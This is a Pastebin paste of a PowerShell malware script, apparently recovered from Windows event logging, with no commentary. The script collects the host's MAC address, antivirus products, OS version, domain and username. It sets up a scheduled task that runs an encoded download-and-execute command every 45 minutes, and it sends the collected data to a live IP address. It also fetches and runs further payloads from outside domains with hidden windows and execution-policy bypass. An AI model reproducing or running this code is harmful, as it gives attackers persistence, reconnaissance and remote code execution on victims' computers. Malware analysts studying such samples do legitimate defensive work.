Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Extracted from EventViewer (Event ID: 4104)
- [string]$av = ""
- [string]$avs = ""
- [string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
- $avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName
- if($avs.GetType().name.IndexOf('Object') -gt -1){
- for($v = 0; $v -lt $avs.Count; $v++){
- $av += $avs[$v] + "|"
- }
- }else{
- $av = $avs
- }
- try{
- if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){
- $av += 'ZDFY'
- }
- }catch{}
- if(-not ($mac -match '^[\da-fA-F-]*$')){
- [string]$mac = "00-00-00-00-00-00"
- }else{}
- [System.Threading.Thread]::Sleep((Get-Random -Minimum 20000 -Maximum 400000))
- $permit = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
- $status = '|'
- $path = "$env:temp\\kkk1.log"
- [string]$flag = test-path $path
- $path2 = "$env:temp\\kill.log"
- [string]$flag2 = test-path $path2
- try{
- $name = 'Global\powerv5'
- $psflag = $flase
- New-Object System.Threading.Mutex ($true,$name,[ref]$psflag)
- }catch{}
- try{
- $name2 = 'Global\powerdv5'
- $dflag = $flase
- New-Object System.Threading.Mutex ($true,$name2,[ref]$dflag)
- }catch{}
- $dt = Get-Date -Format 'yyMMdd'
- $key = "&mac="+$mac+"&av="+$av+"&version="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME + "&PS=" + $psflag
- if($flag -eq 'False'){
- New-Item $path -type file
- try{
- if($permit){
- $status += 'PHig|'
- $Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?h" + $dt + "')"
- $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
- $bcode = [Convert]::ToBase64String($Bytes)
- $ccc = 'schtasks /query /tn "\Microsoft\windows\' + $mac + '" || schtasks /create /ru system /sc MINUTE /mo 45 /st 07:00:00 /tn "\Microsoft\windows\' + $mac + '" /tr "powershell -nop -ep bypass -e ' + $bcode +'" /F'
- &cmd.exe /c $ccc
- }else{
- $status += 'PLow|'
- $Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?l" + $dt + "')"
- $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
- $bcode = [Convert]::ToBase64String($Bytes)
- $ccc = 'schtasks /query /tn "' + $mac + '" || schtasks /create /sc MINUTE /mo 45 /st 07:00:00 /tn "' + $mac + '" /tr "powershell -nop -ep bypass -e ' + $bcode +'" /F'
- &cmd.exe /c $ccc
- }
- }catch{}
- }else{}
- try{
- $download = 'http://27.102.107.137/status.json?allv6' + $key + "&" + $status + "&" + $MyInvocation.MyCommand.Definition
- IEX (New-Object Net.WebClient).DownloadString("$download")
- }catch{}
- try{
- if($psflag){
- $onps = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/newol.dat?allv6" + $key + "')" + '"'
- Start-Process -FilePath cmd.exe -ArgumentList "$onps"
- }else{}
- }catch{}
- try{
- if([IntPtr]::Size -eq 8){
- $dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d64.dat?allv6" + $key + "')" + '"'
- }else{
- $dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d32.dat?allv6" + $key + "')" + '"'
- }
- if($dflag){
- Start-Process -FilePath cmd.exe -ArgumentList "$dglink"
- }else{}
- }catch{}
- [System.Threading.Thread]::Sleep(3000)
- if($flag2 -eq 'False'){
- New-Item $path2 -type file
- Stop-Process -Force -processname powershell
- }else{}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
